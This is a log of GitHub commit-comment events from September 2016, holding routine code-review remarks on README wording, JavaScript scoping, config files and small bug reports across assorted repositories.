{"id":"4538465909","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958528,"position":53,"line":53,"path":"README.md","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:59:27Z","updated_at":"2016-09-09T06:59:27Z","body":"`import Json.Decode as Json` to make this simpler. (I like `as Decode` better, but nobody else seems to do that.)\r\n\r\nAlso, maybe `MeasureWidth` rather than `SomeMessage`?"}},"created_at":"2016-09-09T06:59:27Z"}
{"id":"4538466113","type":"CommitCommentEvent","actor":{"login":"anujsharma9196"},"repo":{"name":"kishanio/CCAvenue-PHP-Library"},"payload":{"comment":{"id":18958529,"position":null,"line":null,"path":null,"commit_id":"1203f496d98778c04ae4f6c419ed86424e28e842","created_at":"2016-09-09T06:59:30Z","updated_at":"2016-09-09T06:59:30Z","body":"is it `Kishanio` or `Kishnio`\r\n\r\nSomewhere it is `Kishanio` and somewhere it is `Kishnio`\r\n\r\nIts a lot confusing, please look for it\r\n"}},"created_at":"2016-09-09T06:59:30Z"}
{"id":"4538473613","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958555,"position":16,"line":16,"path":"README.md","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:01:33Z","updated_at":"2016-09-09T07:01:33Z","body":"Invert this: The elm-mdl usage of Dispatch is beautiful but subtle and complex, and also not an easy to follow example because it is inextricably linked with the elm-mdl `Option` mechanics. \r\n\r\nI suggest putting the example in the repo front and center, then adding a link to elm-mdl as an afterthought. Also, link a specific commit; `Internal.elm` might go away in `master` someday. "}},"created_at":"2016-09-09T07:01:33Z"}
{"id":"4538480603","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18958564,"position":30,"line":64,"path":"ChickenAdventure/Assets/Scripts/Save.cs","commit_id":"a53cc740ced206b1f20197cc38475d8f7b01fbcf","created_at":"2016-09-09T07:03:27Z","updated_at":"2016-09-09T07:03:27Z","body":"`posX` et `posY` ne forment-il par un `Vector2`?"}},"created_at":"2016-09-09T07:03:27Z"}
{"id":"4538480867","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958565,"position":3,"line":3,"path":"README.md","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:03:32Z","updated_at":"2016-09-09T07:03:32Z","body":"\"Dispatch multiple messages in response to a single `Html.Event`.\"\r\n\r\n(\"Makes it easier\" is too vague for my taste.)"}},"created_at":"2016-09-09T07:03:32Z"}
{"id":"4538482743","type":"CommitCommentEvent","actor":{"login":"neutrous"},"repo":{"name":"pika/pika"},"payload":{"comment":{"id":18958573,"position":28,"line":91,"path":"examples/twisted_service.py","commit_id":"5aaa753cd21d652c9b1fa55ee1ee59c53af46490","created_at":"2016-09-09T07:04:07Z","updated_at":"2016-09-09T07:04:07Z","body":"Why removed the `channel.queue_bind`? This may cause none queue to handing the incoming messages!\r\n\r\nIs there anything i make mistake or mis-understand?"}},"created_at":"2016-09-09T07:04:07Z"}
{"id":"4538483917","type":"CommitCommentEvent","actor":{"login":"mattbrailsford"},"repo":{"name":"sebastienros/jint"},"payload":{"comment":{"id":18958574,"position":5,"line":351,"path":"Jint/Native/JsValue.cs","commit_id":"5680d3b8b74d558c60ada017f33bcfad2e8bf72d","created_at":"2016-09-09T07:04:27Z","updated_at":"2016-09-09T07:04:27Z","body":"This breaks issue #11 "}},"created_at":"2016-09-09T07:04:27Z"}
{"id":"4538489148","type":"CommitCommentEvent","actor":{"login":"Rainrider"},"repo":{"name":"Rainrider/AdiButtonAuras"},"payload":{"comment":{"id":18958580,"position":6,"line":20,"path":".travis.yml","commit_id":"6eb093e831fa912278fed7a9246660aebb2bb7a1","created_at":"2016-09-09T07:06:07Z","updated_at":"2016-09-09T07:06:07Z","body":"It is just a logical separation - like don't run the tests on something that does not run. Also its output differs from the other tests. There is no technical reason for it I think."}},"created_at":"2016-09-09T07:06:07Z"}
{"id":"4538490581","type":"CommitCommentEvent","actor":{"login":"walldi"},"repo":{"name":"walldi/smarthome"},"payload":{"comment":{"id":18958586,"position":null,"line":null,"path":null,"commit_id":"b0891a6b8f015c8155530dedf4dd21712425c703","created_at":"2016-09-09T07:06:31Z","updated_at":"2016-09-09T07:06:31Z","body":"Ich teste sonst aus dem Test Verzeichnis, wenn ich mich richtig erinnere. Kann ich leider gerade nicht mehr probieren, weil mein Entwicklungsrechner abgeraucht ist. Deshalb das rumdrücken hier. Vielleicht bekommt Ihr das ja ans laufen. Eigentlich laufen die Tests."}},"created_at":"2016-09-09T07:06:31Z"}
{"id":"4538493014","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18958606,"position":null,"line":null,"path":null,"commit_id":"af66f0da7c4a80d61cafef7de1a54ddc137ee1e6","created_at":"2016-09-09T07:07:19Z","updated_at":"2016-09-09T07:07:19Z","body":"@fichtner I thought of the rc.loader.d directory option, but because it always needed a trigger to generate the file I choose the other one. Only small disadvantage is that we might kill settings which are already in there (chances are small and easy to fix). Let's go with your proposal here, I think we need the functionality, I don't have a very strong opinion on why we should use what I build yesterday.\r\nExpect another commit later today :-)"}},"created_at":"2016-09-09T07:07:19Z"}
{"id":"4538494544","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958612,"position":1,"line":1,"path":"README.md","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:07:49Z","updated_at":"2016-09-09T07:07:49Z","body":"I can't find it again, but I'm pretty certain there was a guideline that packages should not begin with `elm-`. It's too late for elm-mdl, but `dispatch` is pretty cool on its own?"}},"created_at":"2016-09-09T07:07:49Z"}
{"id":"4538497980","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18958622,"position":12,"line":10,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-09T07:08:56Z","updated_at":"2016-09-09T07:08:56Z","body":"What if a different doc comment style is needed?\r\n\r\n```haxe\r\n/**\r\n *\r\n */\r\n```"}},"created_at":"2016-09-09T07:08:56Z"}
{"id":"4538498753","type":"CommitCommentEvent","actor":{"login":"omkjuly84"},"repo":{"name":"playauto/open_test_repo"},"payload":{"comment":{"id":18958624,"position":null,"line":null,"path":null,"commit_id":"6210c9185ac28edb41d932756d073910bba87046","created_at":"2016-09-09T07:09:12Z","updated_at":"2016-09-09T07:09:12Z","body":"이건 아니야!!!!"}},"created_at":"2016-09-09T07:09:12Z"}
{"id":"4538501219","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18958637,"position":20,"line":37,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/TimeSpan/ViewModels/TimeSpanViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-09T07:10:01Z","updated_at":"2016-09-09T07:10:01Z","body":"I think it's better to use nameof(Days) here, to make it less error-prone."}},"created_at":"2016-09-09T07:10:01Z"}
{"id":"4538502043","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958641,"position":5,"line":5,"path":"README.md","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:10:16Z","updated_at":"2016-09-09T07:10:16Z","body":"More to the point:\r\n\r\n\"UI libraries in elm sometimes need to perform internal action on `Html.Events` such as  `onFocus`, while at the same time allowing library clients to _also_ respond to those events. This library provides such multiple dispatch. "}},"created_at":"2016-09-09T07:10:16Z"}
{"id":"4538502147","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"AnnekathrinvH/express-project"},"payload":{"comment":{"id":18958642,"position":128,"line":166,"path":"index.js","commit_id":"f901c8f9eebdd9b0a69e1fcbd061b58cf316585f","created_at":"2016-09-09T07:10:18Z","updated_at":"2016-09-09T07:10:18Z","body":"It might be clearer to call use something like `pgClient` or `dbClient` for `clientGet` and `clientPost` and something like `redisClient` or `cacheClient` for `client`"}},"created_at":"2016-09-09T07:10:18Z"}
{"id":"4538507061","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":18958658,"position":null,"line":null,"path":null,"commit_id":"0cc0a17f65a43bfe9228fe3c444eb61970eb6fcb","created_at":"2016-09-09T07:11:53Z","updated_at":"2016-09-09T07:11:53Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WVzCJXnu&#x2F;6-dans-la-configuration-des-collectionsfields-datasetfiels-mettre-le-code-jbj-dans-une-varaiable-nommee-stylesheet-et-pas-directem\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Dans la configuration des collectionsFields &#x2F; datasetFiels &#x2F; ... mettre le code JBJ dans une varaiable nommée stylesheet et pas directement dans content&lt;</a>"}},"created_at":"2016-09-09T07:11:53Z"}
{"id":"4538507070","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":18958659,"position":null,"line":null,"path":null,"commit_id":"0cc0a17f65a43bfe9228fe3c444eb61970eb6fcb","created_at":"2016-09-09T07:11:53Z","updated_at":"2016-09-09T07:11:53Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WVzCJXnu&#x2F;6-dans-la-configuration-des-collectionsfields-datasetfiels-mettre-le-code-jbj-dans-une-varaiable-nommee-stylesheet-et-pas-directem\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Dans la configuration des collectionsFields &#x2F; datasetFiels &#x2F; ... mettre le code JBJ dans une varaiable nommée stylesheet et pas directement dans content&lt;</a>"}},"created_at":"2016-09-09T07:11:53Z"}
{"id":"4538507226","type":"CommitCommentEvent","actor":{"login":"KK-ZHUANG"},"repo":{"name":"KK-ZHUANG/commission"},"payload":{"comment":{"id":18958660,"position":null,"line":null,"path":null,"commit_id":"a6bcad9e6cb9ec5ff2bd9cd1b73ff20ba7517ec9","created_at":"2016-09-09T07:11:57Z","updated_at":"2016-09-09T07:11:57Z","body":"读取温度"}},"created_at":"2016-09-09T07:11:57Z"}
{"id":"4538507539","type":"CommitCommentEvent","actor":{"login":"sweekes79"},"repo":{"name":"sweekes79/hello-world"},"payload":{"comment":{"id":18958662,"position":null,"line":null,"path":null,"commit_id":"4b9f1ce4cd0ce1fec179c8019161d6e26add8128","created_at":"2016-09-09T07:12:02Z","updated_at":"2016-09-09T07:12:02Z","body":"Trying to make a change to see the difference."}},"created_at":"2016-09-09T07:12:02Z"}
{"id":"4538507604","type":"CommitCommentEvent","actor":{"login":"asiekierka"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18958663,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-09T07:12:03Z","updated_at":"2016-09-09T07:12:03Z","body":"'quantity' doesn't roll off the tongue; 'size' can also mean the maximum size of a stack."}},"created_at":"2016-09-09T07:12:03Z"}
{"id":"4538510149","type":"CommitCommentEvent","actor":{"login":"iwillspeak"},"repo":{"name":"rust-onig/rust-onig"},"payload":{"comment":{"id":18958671,"position":18,"line":18,"path":"examples/simple.rs","commit_id":"ca7679353602feb5b915f0dbc0e1594ae9a88a7d","created_at":"2016-09-09T07:12:48Z","updated_at":"2016-09-09T07:12:48Z","body":"Not sure what the best way to do this iteration is. Maybe we should `impl Iterator for Region`?"}},"created_at":"2016-09-09T07:12:48Z"}
{"id":"4538510315","type":"CommitCommentEvent","actor":{"login":"pacastillo"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18958672,"position":null,"line":null,"path":null,"commit_id":"adfc3d01e0480c8b4a290d863dd81bb89ec56f4b","created_at":"2016-09-09T07:12:50Z","updated_at":"2016-09-09T07:12:50Z","body":"I will do this evening."}},"created_at":"2016-09-09T07:12:50Z"}
{"id":"4538510692","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18958674,"position":22,"line":20,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-09T07:12:57Z","updated_at":"2016-09-09T07:12:57Z","body":"I like it! :+1: "}},"created_at":"2016-09-09T07:12:57Z"}
{"id":"4538510701","type":"CommitCommentEvent","actor":{"login":"chanchihiro"},"repo":{"name":"chanchihiro/swipe_angular"},"payload":{"comment":{"id":18958675,"position":6,"line":6,"path":"README.md","commit_id":"2340a6b9469708b1cd45ad87c5f4347f812d8139","created_at":"2016-09-09T07:12:57Z","updated_at":"2016-09-09T07:12:57Z","body":"#OverView"}},"created_at":"2016-09-09T07:12:57Z"}
{"id":"4538511232","type":"CommitCommentEvent","actor":{"login":"chanchihiro"},"repo":{"name":"chanchihiro/swipe_angular"},"payload":{"comment":{"id":18958679,"position":6,"line":6,"path":"README.md","commit_id":"2340a6b9469708b1cd45ad87c5f4347f812d8139","created_at":"2016-09-09T07:13:08Z","updated_at":"2016-09-09T07:13:08Z","body":"#overview"}},"created_at":"2016-09-09T07:13:08Z"}
{"id":"4538511861","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":18958682,"position":null,"line":null,"path":null,"commit_id":"1551787204073ece096d3474c489b82691cd2bd8","created_at":"2016-09-09T07:13:18Z","updated_at":"2016-09-09T07:13:18Z","body":":+1: "}},"created_at":"2016-09-09T07:13:18Z"}
{"id":"4538516565","type":"CommitCommentEvent","actor":{"login":"chanchihiro"},"repo":{"name":"chanchihiro/swipe_angular"},"payload":{"comment":{"id":18958693,"position":6,"line":6,"path":"README.md","commit_id":"2340a6b9469708b1cd45ad87c5f4347f812d8139","created_at":"2016-09-09T07:14:44Z","updated_at":"2016-09-09T07:14:44Z","body":"#overview"}},"created_at":"2016-09-09T07:14:44Z"}
{"id":"4538516573","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18958694,"position":5,"line":111,"path":"index.js","commit_id":"5b9b9eb2e1832349037b04a186301ebdefff8750","created_at":"2016-09-09T07:14:44Z","updated_at":"2016-09-09T07:14:44Z","body":"I was nervous for a second that you were creating a global here. I think indentation would help:\r\n\r\n```\r\nvar objectForHandlebars = {},\r\n    allMyUsers = [],\r\n    client = new pg.Client(\"postgres://spiced:spiced1@localhost:5432/Users\"),\r\n    checkEm\r\n;"}},"created_at":"2016-09-09T07:14:44Z"}
{"id":"4538517798","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18958698,"position":28,"line":136,"path":"index.js","commit_id":"5b9b9eb2e1832349037b04a186301ebdefff8750","created_at":"2016-09-09T07:15:06Z","updated_at":"2016-09-09T07:15:06Z","body":"These should be indented over one"}},"created_at":"2016-09-09T07:15:06Z"}
{"id":"4538518719","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18958703,"position":14,"line":12,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-09T07:15:22Z","updated_at":"2016-09-09T07:15:22Z","body":"It would be nice to support `<>` here for type parmams. I guess that'd require some good `notIn` rules to avoid conflicts with the binpos though.. "}},"created_at":"2016-09-09T07:15:22Z"}
{"id":"4538520974","type":"CommitCommentEvent","actor":{"login":"savahu"},"repo":{"name":"Jackett/Jackett"},"payload":{"comment":{"id":18958706,"position":null,"line":null,"path":null,"commit_id":"ecd2b33dfc618a4e0938023ad2e749b220ffd6af","created_at":"2016-09-09T07:16:04Z","updated_at":"2016-09-09T07:16:04Z","body":"Actually I think PTN supports boolean (AND) search.\r\nI found an invisible div called 'advancedsearch' on the browse page, and it seems to do a boolean search.\r\n\r\nhttp://piratethenet.org/torrentsutils.php?action=torrentstable&viewtype=0&visiblecategories=Action%2CAdventure%2CAnimation%2CBiography%2CComedy%2CCrime%2CDocumentary%2CDrama%2CEastern%2CFamily%2CFantasy%2CHistory%2CHoliday%2CHorror%2CKids%2CMusical%2CMystery%2CRomance%2CSci-Fi%2CShort%2CSports%2CThriller%2CWar%2CWestern&hiddenqualities=&page=1&visibility=aliveonly&compression=showall&sort=browsedate&order=DESC&searchstring=&titleonly=false&packs=showall&bookmarks=showall&subscriptions=showall&skw=showall&advancedsearchparameters=%5Bname%3Dthe+guard%5D\r\n\r\nUsing 'advancedsearchparameters' instead of 'searchstring' does the trick.\r\nI searched for 'the guard', first with the searchstring, and then with 'advancedsearchparameters'.\r\nUsing 'searchstring' returned 1380 results.\r\nUsing 'advancedsearchparameters' it returned just 2 results."}},"created_at":"2016-09-09T07:16:04Z"}
{"id":"4538522004","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"js-org/dns.js.org"},"payload":{"comment":{"id":18958708,"position":null,"line":null,"path":null,"commit_id":"5e344cf8b11f8079bcc786225842cf34a4260d40","created_at":"2016-09-09T07:16:22Z","updated_at":"2016-09-09T07:16:22Z","body":"Oops, sorry."}},"created_at":"2016-09-09T07:16:22Z"}
{"id":"4538522463","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958709,"position":6,"line":6,"path":"README.md","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:16:30Z","updated_at":"2016-09-09T07:16:30Z","body":"The above (headline, first two paragraphs) is what github displays on mobile, so it should preferably (1) say exactly what the library does and (2) say all the positive things you can think of. \r\n\r\nAt this point, which users read only after clicking \"View all of README.md\", first say that the library is a \"central component in\" or has \"proven useful in\" elm-mdl so users know this is already used in a major elm library. \r\n\r\nThen explain in a little more detail why you need this. Here' a rough outline of how I'd do it: \r\n1. Setup the problem: My button needs onMouseLeave, but user also needs onMouseLeave. (We want to be concrete.)\r\n2. Can't just merge together attributes, last handler wins.  \r\n3. Can't just write special `onMouseLeave` option which dispatches a message using OutMsg or takes a Msg argument, because pretty soon we're wrapping all of `Html.Events` for every component in the library. This happened in elm-mdl and was the original motivation for dispatch.\r\n4. So, Dispatch, a library for combining Decoders. \r\n\r\n\r\n"}},"created_at":"2016-09-09T07:16:30Z"}
{"id":"4538522567","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18958710,"position":18,"line":133,"path":"index.js","commit_id":"5b9b9eb2e1832349037b04a186301ebdefff8750","created_at":"2016-09-09T07:16:32Z","updated_at":"2016-09-09T07:16:32Z","body":"I don't see this declared"}},"created_at":"2016-09-09T07:16:32Z"}
{"id":"4538522736","type":"CommitCommentEvent","actor":{"login":"amateo"},"repo":{"name":"camptocamp/puppet-openldap"},"payload":{"comment":{"id":18958712,"position":138,"line":180,"path":"lib/puppet/provider/openldap_overlay/olc.rb","commit_id":"e34398869fb82710bf3e95e667f75e860fd58d7f","created_at":"2016-09-09T07:16:35Z","updated_at":"2016-09-09T07:16:35Z","body":"Ooops... It's a typo"}},"created_at":"2016-09-09T07:16:35Z"}
{"id":"4538523963","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"linuxdeepin/deepin-desktop-schemas"},"payload":{"comment":{"id":18958716,"position":null,"line":null,"path":null,"commit_id":"d0d7e169a4b5699393f1be1fcf39a2178c445b27","created_at":"2016-09-09T07:16:58Z","updated_at":"2016-09-09T07:16:58Z","body":"Since that my .xsession-errors says\r\n``(process:635): GLib-GIO-CRITICAL **: g_settings_set_value: key 'brightness' in 'com.deepin.dde.display' expects type 'd', but a GVariant of type 's' was given``"}},"created_at":"2016-09-09T07:16:58Z"}
{"id":"4538524329","type":"CommitCommentEvent","actor":{"login":"fxprunayre"},"repo":{"name":"geonetwork/core-geonetwork"},"payload":{"comment":{"id":18958719,"position":12,"line":365,"path":"web-ui/src/main/resources/catalog/locales/en-search.json","commit_id":"3e059308829a10f9493a370a2bdaf959962b9f9d","created_at":"2016-09-09T07:17:06Z","updated_at":"2016-09-09T07:17:06Z","body":"JSON file is invalid, missing comma."}},"created_at":"2016-09-09T07:17:06Z"}
{"id":"4538524389","type":"CommitCommentEvent","actor":{"login":"lettucebo"},"repo":{"name":"lettucebo/MimeTypeMap.List"},"payload":{"comment":{"id":18958720,"position":null,"line":null,"path":null,"commit_id":"fac63f5d692a674e99dd6e8aef2447c4884a4c49","created_at":"2016-09-09T07:17:07Z","updated_at":"2016-09-09T07:17:07Z","body":"resolve #1 "}},"created_at":"2016-09-09T07:17:07Z"}
{"id":"4538526479","type":"CommitCommentEvent","actor":{"login":"marti1125"},"repo":{"name":"marti1125/html"},"payload":{"comment":{"id":18958724,"position":null,"line":null,"path":null,"commit_id":"bd14173f3751f4a7344c5cc6bbef63bdceefb805","created_at":"2016-09-09T07:17:45Z","updated_at":"2016-09-09T07:17:45Z","body":"@domenic please review it =D"}},"created_at":"2016-09-09T07:17:45Z"}
{"id":"4538526666","type":"CommitCommentEvent","actor":{"login":"XWB"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18958726,"position":null,"line":null,"path":null,"commit_id":"d7e1f2f89228291acb0a5fcf9db02810ca7f6716","created_at":"2016-09-09T07:17:49Z","updated_at":"2016-09-09T07:17:49Z","body":"Merged, thanks :)"}},"created_at":"2016-09-09T07:17:49Z"}
{"id":"4538527163","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"openMVG/openMVG"},"payload":{"comment":{"id":18958729,"position":10,"line":10,"path":"src/openMVG_Samples/image_spherical_to_pinholes/panorama_helper.hpp","commit_id":"36de6b572a65eaa44ea2b3757b12c40437d1cede","created_at":"2016-09-09T07:17:58Z","updated_at":"2016-09-09T07:17:58Z","body":"thanks. Fixed"}},"created_at":"2016-09-09T07:17:58Z"}
{"id":"4538528820","type":"CommitCommentEvent","actor":{"login":"XWB"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18958734,"position":null,"line":null,"path":null,"commit_id":"e12f8bfe51ebbc18d9ef8b18d427d4b4a54a8ee5","created_at":"2016-09-09T07:18:30Z","updated_at":"2016-09-09T07:18:30Z","body":":+1: "}},"created_at":"2016-09-09T07:18:30Z"}
{"id":"4538529750","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958736,"position":20,"line":20,"path":"README.md","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:18:48Z","updated_at":"2016-09-09T07:18:48Z","body":"You want to move this into an actual example and remove it from README.me. Refer to `examples/` instead. \r\n\r\nDispatch has two uses: Provide multiple dispatch or a single event (this example) and writing UI library APIs (example1.elm). This example is the less interesting case, since for this particular example it'd likely be easier to just do it all in `update`. "}},"created_at":"2016-09-09T07:18:48Z"}
{"id":"4538531077","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18958741,"position":81,"line":165,"path":"index.js","commit_id":"5b9b9eb2e1832349037b04a186301ebdefff8750","created_at":"2016-09-09T07:19:13Z","updated_at":"2016-09-09T07:19:13Z","body":"This declaration is in a different scope so it doesn't stop the `cityItems` above from going into the global scope"}},"created_at":"2016-09-09T07:19:13Z"}
{"id":"4538532165","type":"CommitCommentEvent","actor":{"login":"clash0909"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18958744,"position":3,"line":33,"path":"README.md","commit_id":"ba7831780ba439e248b99c83c8f1733157226b61","created_at":"2016-09-09T07:19:30Z","updated_at":"2016-09-09T07:19:30Z","body":"Free Pokemon GO bot with modern UI based on PokeMobBot and NecroBot\r\nLink : https://github.com/Lunat1q/Catchem-Po...\r\nFeatures\r\n\r\nDiscovery pathing function bot continue to walk in radom direction from pokestop to pokestop, it pick closest pokestop each turn!\r\nForce move option, just double click to the map and bot will start moving there!\r\nProxy support\r\nAll settings from UI\r\nYou can set startup location from the map, just select the bot , go to the map tab, and just double-click to desired position\r\nFull controll of your inventory or pokemons\r\nSmooth controll of movement speed on the run via MoveSpeedFactor slider\r\nMake map follow your player\r\nSetup multiple bots\r\nUpgrade your Pokemon directly from GUI"}},"created_at":"2016-09-09T07:19:30Z"}
{"id":"4538532836","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958746,"position":3,"line":3,"path":"elm-package.json","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:19:42Z","updated_at":"2016-09-09T07:19:42Z","body":"\"Dispatch multiple messages in response to a single Html.Event.\"\r\n\r\n(Or whatever, but make it the exact same as the first paragraph in README.md.)"}},"created_at":"2016-09-09T07:19:42Z"}
{"id":"4538533495","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958748,"position":5,"line":5,"path":"elm-package.json","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T07:19:53Z","updated_at":"2016-09-09T07:19:53Z","body":"Apache?"}},"created_at":"2016-09-09T07:19:53Z"}
{"id":"4538535130","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Wikonator/Expresso"},"payload":{"comment":{"id":18958752,"position":81,"line":165,"path":"index.js","commit_id":"5b9b9eb2e1832349037b04a186301ebdefff8750","created_at":"2016-09-09T07:20:24Z","updated_at":"2016-09-09T07:20:24Z","body":"I don't actually see cityItems and colorItems used in the scope"}},"created_at":"2016-09-09T07:20:24Z"}
{"id":"4538536777","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":18958756,"position":null,"line":null,"path":null,"commit_id":"362c88db4ba0474effb6a7db1b4de137ea82b866","created_at":"2016-09-09T07:20:53Z","updated_at":"2016-09-09T07:20:53Z","body":"The unique difference is, that you omit the odd-length-patterns thus driving faster toward bigger skip-sizes which recently figured out to be counterproductive at longer time control.\r\nApologies and no hard feelings, but for me this is a pointless test in an already stodged queue..."}},"created_at":"2016-09-09T07:20:53Z"}
{"id":"4538537787","type":"CommitCommentEvent","actor":{"login":"adi130987"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18958759,"position":22,"line":31,"path":"index.html","commit_id":"45c2536ee28aba3834f776319327ecec900ca12c","created_at":"2016-09-09T07:21:12Z","updated_at":"2016-09-09T07:21:12Z","body":"It should be, but for now we do not have all the images to put in mainfest.json ... it will be changed later."}},"created_at":"2016-09-09T07:21:12Z"}
{"id":"4538537959","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18958761,"position":null,"line":null,"path":null,"commit_id":"862644923c0057c9fbca906dfc5e0df7ba0bafe0","created_at":"2016-09-09T07:21:15Z","updated_at":"2016-09-09T07:21:15Z","body":"I brought this commit into the main codebase (doing this makes the rebase of the eye form branch easier, which am currently working on)."}},"created_at":"2016-09-09T07:21:15Z"}
{"id":"4538541391","type":"CommitCommentEvent","actor":{"login":"Samadhibin"},"repo":{"name":"linux-sunxi/linux-sunxi"},"payload":{"comment":{"id":18958768,"position":null,"line":null,"path":null,"commit_id":"2e1c5c5a374ca9117831d2ceb95cdd6cb5d8478b","created_at":"2016-09-09T07:22:19Z","updated_at":"2016-09-09T07:22:19Z","body":"hi,\r\n\r\nThere is any news about this problem? \r\nWe are facing nand filesystem corruption on a custom board.\r\n\r\nThanks."}},"created_at":"2016-09-09T07:22:19Z"}
{"id":"4538547183","type":"CommitCommentEvent","actor":{"login":"clash0909"},"repo":{"name":"clash0909/Catchem-PoGo"},"payload":{"comment":{"id":18958780,"position":1,"line":31,"path":"README.md","commit_id":"ba7831780ba439e248b99c83c8f1733157226b61","created_at":"2016-09-09T07:24:06Z","updated_at":"2016-09-09T07:24:06Z","body":"Free Pokemon GO bot with modern UI based on PokeMobBot and NecroBot\r\nLink : https://github.com/Lunat1q/Catchem-Po...\r\nFeatures\r\n\r\nDiscovery pathing function bot continue to walk in radom direction from pokestop to pokestop, it pick closest pokestop each turn!\r\nForce move option, just double click to the map and bot will start moving there!\r\nProxy support\r\nAll settings from UI\r\nYou can set startup location from the map, just select the bot , go to the map tab, and just double-click to desired position\r\nFull controll of your inventory or pokemons\r\nSmooth controll of movement speed on the run via MoveSpeedFactor slider\r\nMake map follow your player\r\nSetup multiple bots\r\nUpgrade your Pokemon directly from GUI"}},"created_at":"2016-09-09T07:24:06Z"}
